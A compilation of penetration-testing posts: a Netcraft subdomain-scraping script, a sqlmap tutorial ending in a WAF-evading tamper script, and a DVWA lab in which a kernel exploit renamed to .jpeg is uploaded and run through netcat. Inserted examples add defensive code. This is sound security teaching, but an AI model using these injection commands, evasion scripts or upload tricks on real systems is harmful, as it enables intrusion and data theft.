Netcraft DNS Search Engine


DNS Results From Netcraft Search Engine

The following Python script is dedicated to CHC members; it obtains DNS results from the Netcraft search engine. This can be used in the information-gathering stage of a penetration test. You can find the source code and a screenshot of the script in use below:

#!/usr/bin/python
# Python 2 script (httplib and print statements); run it with a Python 2 interpreter.
import httplib
import re
import sys

HOST = 'searchdns.netcraft.com'
USER_AGENT = 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4'

def help():
    print "[netcraftdns v1.0] - by neuro [0x0lab.org]"
    print "\nUsage: python netcraftdns.py <domain_name> \n"
    sys.exit()

if len(sys.argv) == 2:
    domain_name = sys.argv[1]
else:
    help()

netcraftres = []   # unique hostnames collected so far
nres = 0           # total number of results reported by Netcraft ("Found N")

def fetch(path):
    """GET path from Netcraft; return the response body, or None on a non-200 reply."""
    rg = httplib.HTTP(HOST)
    rg.putrequest('GET', path)
    rg.putheader('Host', HOST)
    rg.putheader('User-agent', USER_AGENT)
    rg.endheaders()
    errcode, errmsg, headers = rg.getreply()
    if errcode != 200:
        print 'Error Sending Request', errcode, errmsg
        return None
    return rg.getfile().read()

def count(domain_name):
    """Read the 'Found N' total from the first results page into nres."""
    global nres
    rgdata = fetch("/?restriction=site+ends+with&host=" + domain_name)
    if rgdata is None:
        return
    for total in re.findall('Found [0-9]*', rgdata, re.I):
        nres = int(re.sub('Found ', '', total) or 0)
    print "[+]-Total Netcraft Results:", nres

def collect(rgdata, domain_name):
    """Extract hostnames ending in .domain_name from a page; print and store the new ones."""
    pattern = re.compile(r'[\w.\-]+\.' + re.escape(domain_name), re.I)
    for netres in pattern.findall(rgdata):
        if netres not in netcraftres:
            netcraftres.append(netres)
            print " |-", str(netres)

def results(domain_name):
    """Print the first page of hostnames, then page through the rest 20 at a time."""
    rgdata = fetch("/?restriction=site+ends+with&host=" + domain_name)
    if rgdata is None:
        return
    collect(rgdata, domain_name)
    y = 21  # Netcraft lists 20 results per page; the next page starts at 21
    while y <= nres and netcraftres:
        rgdata1 = fetch("/?host=*." + domain_name + "&last=" + netcraftres[-1]
                        + "&from=" + str(y) + "&restriction=site%20contains&position=")
        if rgdata1 is None:
            break
        collect(rgdata1, domain_name)
        y = y + 20

count(domain_name)
results(domain_name)

netcraftdns - Sample Results (screenshot)
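As an added example (not part of the original script and not Netcraft's code), here is the parsing and paging logic of the script above in Python 3, run against a constructed stand-in for a Netcraft results page. The regex escapes the domain and anchors both ends, so a lookalike name that merely contains the domain is not collected, and the page offsets and follow-up query string are built the way the script does (20 results per page, next page at from=21). The HTML, the hostnames and the page size are assumptions made for this example, not real Netcraft output.

```python
import re
from urllib.parse import urlencode

PAGE_SIZE = 20  # assumption carried over from the script: 20 rows per page, next page at from=21

# Constructed sample page: a stand-in for the Netcraft result HTML (not real Netcraft markup).
SAMPLE_HTML = """
<h2>Results for example.com</h2>
<p>Found 43 sites</p>
<table>
<tr><td><a href="http://www.example.com/">www.example.com</a></td></tr>
<tr><td><a href="http://mail.example.com/">mail.example.com</a></td></tr>
<tr><td>www.example.com</td></tr>
<tr><td>dev-01.example.com</td></tr>
<tr><td>notexample.com</td></tr>
<tr><td>www.example.com.evil.test</td></tr>
</table>
"""


def parse_total(html):
    """Return the 'Found N' count as an int, or 0 when the page carries no count."""
    m = re.search(r'Found\s+(\d+)', html, re.I)
    return int(m.group(1)) if m else 0


def extract_hosts(html, domain):
    """Unique hostnames ending in .<domain>, in order of first appearance.

    The lookbehind/lookahead stop the match from starting or ending inside a
    longer name, so 'www.example.com.evil.test' is not reported as 'www.example.com'.
    """
    pattern = re.compile(r'(?<![\w.-])[\w-][\w.-]*\.' + re.escape(domain) + r'(?![\w.-])', re.I)
    seen = []
    for host in pattern.findall(html):
        host = host.lower()
        if host not in seen:
            seen.append(host)
    return seen


def page_offsets(total, page_size=PAGE_SIZE):
    """Offsets of the follow-up pages (21, 41, ...) needed to cover `total` results."""
    return list(range(page_size + 1, total + 1, page_size))


def next_page_query(domain, last_host, offset):
    """Query string with the same parameters the script sends for follow-up pages, URL-encoded."""
    return urlencode({"host": "*." + domain, "last": last_host, "from": offset,
                      "restriction": "site contains", "position": ""})


if __name__ == "__main__":
    total = parse_total(SAMPLE_HTML)
    hosts = extract_hosts(SAMPLE_HTML, "example.com")
    print("[+]-Total Netcraft Results:", total)
    for h in hosts:
        print(" |-", h)
    for off in page_offsets(total):
        print("next page:", next_page_query("example.com", hosts[-1], off))
```

The script paginates on the last hostname seen plus an offset; `page_offsets` makes that arithmetic explicit so you can see how many requests a given total implies before sending any.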


Advanced Sqlmap Commands


Advanced Sqlmap tutorial

1. When you have the target URL but are not sure whether any parameter in that request is vulnerable, sqlmap can act as a scanner. The syntax for a GET request is as follows:

./sqlmap.py -u "http://www.site.com/oldman.php?id=5&text=dummy"

The syntax for a POST request is as follows:

./sqlmap.py -u "http://www.site.com/oldman.php" --data="id=5&text=dummy"

This will tell you whether any of the parameters (id, text) is vulnerable to SQL injection. Note: throughout this tutorial we use a POST request as the example. The only difference between the GET and POST syntax is that the POST request has an additional switch (--data) carrying your POST parameters and their values.

2. When you suspect that a particular parameter is vulnerable to SQL injection, you can name that parameter with the -p switch. The syntax is as follows:

./sqlmap.py -u "http://www.site.com/oldman.php" --data="id=5&text=dummy" -p "id"

sqlmap will check whether the parameter "id" is injectable.

3. If the request described in the previous scenarios (1, 2) is only available after the user authenticates with the application, the steps are as follows:

a) Log in to the application.
b) Note down all the cookie names and their values. Let us assume the cookies generated are cookie1=dummy_val1 and cookie2=dummy_val2.
c) Use the sqlmap --cookie switch to replay these cookies along with the sqlmap requests.

So the syntax will be:

./sqlmap.py -u "http://www.site.com/oldman.php" --data="id=5&text=dummy" -p "id" --cookie="cookie1=dummy_val1;cookie2=dummy_val2"

4. To get information about the backend database, such as its version banner, the current database name and the database user, the syntax is:

./sqlmap.py -u "http://www.site.com/oldman.php" --data="id=5&text=dummy" -p "id" -b --current-db --current-user

5. To list the tables of the dummydb database, the syntax is:

./sqlmap.py -u "http://www.site.com/oldman.php" --data="id=5&text=dummy" -p "id" --tables -D "dummydb"


6. To list the columns of the admin table, the syntax is:

./sqlmap.py -u "http://www.site.com/oldman.php" --data="id=5&text=dummy" -p "id" --columns -T "admin"


7. When you know the backend database provider (mssql, mysql, oracle, etc.), you can specify it with the --dbms switch. This tells sqlmap not to try queries for other database types, which speeds up the injection process:

./sqlmap.py -u "http://www.site.com/oldman.php" --data="id=5&text=dummy" -p "id" -b --dbms="oracle"

8. If the application is protected by a web application firewall (WAF), you can try the various tamper scripts to get past WAF detection. There are almost 30 such tamper scripts available. To specify one or more of them, use the --tamper switch. The syntax is:

./sqlmap.py -u "http://www.site.com/oldman.php" --data="id=5&text=dummy" -p "id" -b --tamper="tamper_script1_name.py,tamper_script2_name.py"

All the available tamper scripts can be found under the tamper directory inside the sqlmap root directory.


9. Writing your own tamper script. There are cases where the application has a very weak detection signature but none of the existing tamper scripts can do the job. For example, if the application code detects "UNION SELECT" but not "UNION SELEcT", sqlmap will not be able to inject that target, because all of sqlmap's payloads look like "UNION ALL SELECT", "WAITFOR DELAY", etc. So let us create our own tamper script. The format of any tamper script is as follows:



# Needed imports
from lib.core.enums import PRIORITY

# Define the order in which this tamper script is applied to the payload
__priority__ = PRIORITY.NORMAL

def tamper(payload):
    ''' Description of your tamper script '''
    retVal = payload
    # your code to tamper the original payload
    # return the tampered payload
    return retVal




Based on the above tamper script format, our script will be:

#!/usr/bin/env python
"""
Sample script by oldmanlab.
Email : oldmanlab@gmail.com
"""
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.NORMAL

def tamper(payload):
    """
    INPUT         : UNION ALL SELECT
    OUTPUT        : UNION ALL SELEcT
    TESTED AGAINST: mysql 5.x.x
    """
    retVal = payload
    if payload:
        retVal = ""
        for i in range(len(payload)):
            if payload[i:i+10] == "ALL SELECT":
                # flip the case of one letter and copy the rest of the payload unchanged
                retVal += "ALL SELEcT" + payload[i+10:]
                break
            else:
                retVal += payload[i]
    return retVal
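Step 9 works because the detector matches "UNION SELECT" only in exact case. As an added example (not from this tutorial and not sqlmap's code), the following Python compares that weak check with a case-insensitive, whitespace-tolerant, word-bounded one over a few constructed payloads, including the "UNION ALL SELEcT" variant the tamper script above produces. The payload list and function names are assumptions made for this example; a production WAF rule set is far more involved, and this only shows why a signature has to normalise case and spacing before matching.

```python
import re

# Constructed sample payloads. The third is the case-variant the tutorial's tamper script
# emits; the last is a benign string that contains the keywords only as substrings.
SAMPLE_PAYLOADS = [
    "1 UNION SELECT username, password FROM users",
    "1 UNION ALL SELECT NULL, NULL",
    "1 UNION ALL SELEcT NULL, NULL",
    "1 union all select NULL, NULL",
    "1 UNION ALL   SELECT NULL",
    "look up the reunion selection",
]


def naive_signature(payload):
    """The weak check described in step 9: exact, case-sensitive substring match."""
    return "UNION SELECT" in payload or "UNION ALL SELECT" in payload


def robust_signature(payload):
    """Case-insensitive match that tolerates any run of whitespace and requires
    whole words, so 'reunion selection' does not trigger it."""
    return re.search(r'\bUNION\s+(?:ALL\s+)?SELECT\b', payload, re.I) is not None


def evaluate(payloads):
    """Map each payload to its (naive, robust) verdict pair."""
    return {p: (naive_signature(p), robust_signature(p)) for p in payloads}


def missed_by_naive(payloads):
    """Payloads the robust rule flags but the naive rule lets through."""
    return [p for p in payloads if robust_signature(p) and not naive_signature(p)]


if __name__ == "__main__":
    for payload, (naive, robust) in evaluate(SAMPLE_PAYLOADS).items():
        print("naive=%-5s robust=%-5s %s" % (naive, robust, payload))
    print("missed by the case-sensitive rule:", missed_by_naive(SAMPLE_PAYLOADS))
```

The interesting rows are the ones where the two verdicts differ: every payload that differs from the signature only in case or spacing slips past `naive_signature`, which is exactly the gap a one-letter tamper script exploits.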




Advanced Web Penetration

Web Application Hacking

In this post, I'll try to show how to gain root access through a web application. There are a lot of methods to do that; this is one of them. The web application used is DVWA (Damn Vulnerable Web Application). You can download it here. The installation instructions are there too.
- Start up your apache and mysql.

- Open dvwa in browser.

- Login with username : admin and password : password.

- DVWA main page.

- The vulnerability I'll use to gain root access from this web application is its "command execution" feature, because in a web application this is the most dangerous feature to have: an attacker can get a shell without having to place a backdoor on the server.
- Set the security level to medium. (because 'low' would be too easy and 'hard' would be too difficult..   :P   )

- Let's try a normal command.


- Next, let's execute multiple commands.

 

- Let's try to use a pipe "|".

- Looking good. Now, let's begin the attack.  >:)
- I'll use a local exploit on the system to gain root access. Before searching for the exploit, let's see what kernel version the system is running.

- Search exploit-db for a local exploit. Using the keyword "2.6.39", I found this exploit, created by zx2c4 and written in C.

- After downloading the exploit, let's compile it before transferring it to the target. Original exploit code here.

- Exploit ready to be used.
- Now let's try to upload it using "File Upload" on DVWA. Before doing that, I'll raise the DVWA security to the High level, because that is a rule in my training center.

- OK, let's try to upload the exploit.



- Whoops, it looks like the server only accepts image files for upload.
- Let's add an image extension to the exploit. I'll rename it to exploit.jpeg.

- Upload it.

- Good. Now, let's connect to the server using netcat to execute that exploit.
- Back to the "Command Execution" feature. (Don't forget to change the DVWA security back to medium.)
- Let's see whether the exploit was uploaded correctly.

- Now, run netcat on the DVWA host in listening mode.

- Look at the bottom/status bar: the browser will wait for a connection. In BackTrack's terminal, type "nc 127.0.0.1 4321".


- Then, move to the directory where the exploit is located.

- Execute it.  

- Not good, the exploit didn't work properly.  =,=
- Turns out I hadn't changed the permissions to make the exploit executable.  :P
- To change them, simply type "chmod 777 exploit.jpeg".

- Next, let's try to execute it again.

- It's running. But the process of spawning a root shell is taking very long. I wonder whether the exploit succeeded. Have to research more..  :)
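Two weaknesses this walkthrough relies on are the command-execution page passing user input into a shell (so "|" and chained commands run) and the upload check trusting the file extension (so exploit.jpeg gets through). As an added example, not DVWA's code (which is PHP) and not from this post, the Python below shows the corresponding defensive checks: validate the input as a host and hand it to the process as an argv list with no shell, and classify an upload by its leading bytes, requiring the extension to agree with the content. The function names, the magic-byte table and the sample inputs are assumptions made for this example.

```python
import ipaddress
import re

# Leading bytes of the image types an upload form might allow (constructed for this example
# from the well-known file signatures) and the ELF signature an uploaded binary would carry.
IMAGE_MAGIC = {
    b"\xff\xd8\xff": "jpeg",
    b"\x89PNG\r\n\x1a\n": "png",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}
ELF_MAGIC = b"\x7fELF"
ALLOWED_EXTENSIONS = {"jpeg": {"jpg", "jpeg"}, "png": {"png"}, "gif": {"gif"}}

# RFC 1123-style hostname: labels of letters, digits and inner hyphens, joined by dots.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
_HOSTNAME = re.compile(r"(?:%s\.)*%s" % (_LABEL, _LABEL))


def is_valid_host(value):
    """True only for a literal IP address or a plain hostname. Whitespace, '|', ';', '&&'
    and a leading '-' (which ping would read as an option) all fail the check."""
    if not value or len(value) > 253:
        return False
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return _HOSTNAME.fullmatch(value) is not None


def build_ping_argv(value):
    """argv list for subprocess.run(argv) with shell=False, or None if validation fails.
    With no shell involved there is nothing for a metacharacter to act on."""
    if not is_valid_host(value):
        return None
    return ["ping", "-c", "1", value]


def classify_upload(filename, data):
    """Classify an upload by its content and check that the extension agrees with it."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    kind = next((k for magic, k in IMAGE_MAGIC.items() if data.startswith(magic)), None)
    if kind is None:
        kind = "elf" if data.startswith(ELF_MAGIC) else "unknown"
    accept = kind in ALLOWED_EXTENSIONS and ext in ALLOWED_EXTENSIONS[kind]
    return {"extension": ext, "content": kind, "accept": accept}


# Constructed sample inputs: the kind of values the DVWA page above received.
SAMPLE_HOSTS = ["127.0.0.1", "localhost", "127.0.0.1 | id", "127.0.0.1 && id", "-c"]
SAMPLE_UPLOADS = [
    ("exploit.jpeg", b"\x7fELF\x02\x01\x01" + b"\x00" * 9),   # renamed binary
    ("photo.jpg", b"\xff\xd8\xff\xe0\x00\x10JFIF"),           # genuine JPEG header
    ("photo.jpg", b"\x89PNG\r\n\x1a\n"),                      # PNG content, wrong extension
]

if __name__ == "__main__":
    for host in SAMPLE_HOSTS:
        print("%-20r -> %s" % (host, build_ping_argv(host)))
    for name, blob in SAMPLE_UPLOADS:
        print("%-14s -> %s" % (name, classify_upload(name, blob)))
```

The upload check deliberately ignores what the extension claims until after the content has been identified; an ELF file renamed to .jpeg is reported as content "elf" and rejected, and an image whose extension does not match its real type is rejected too.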


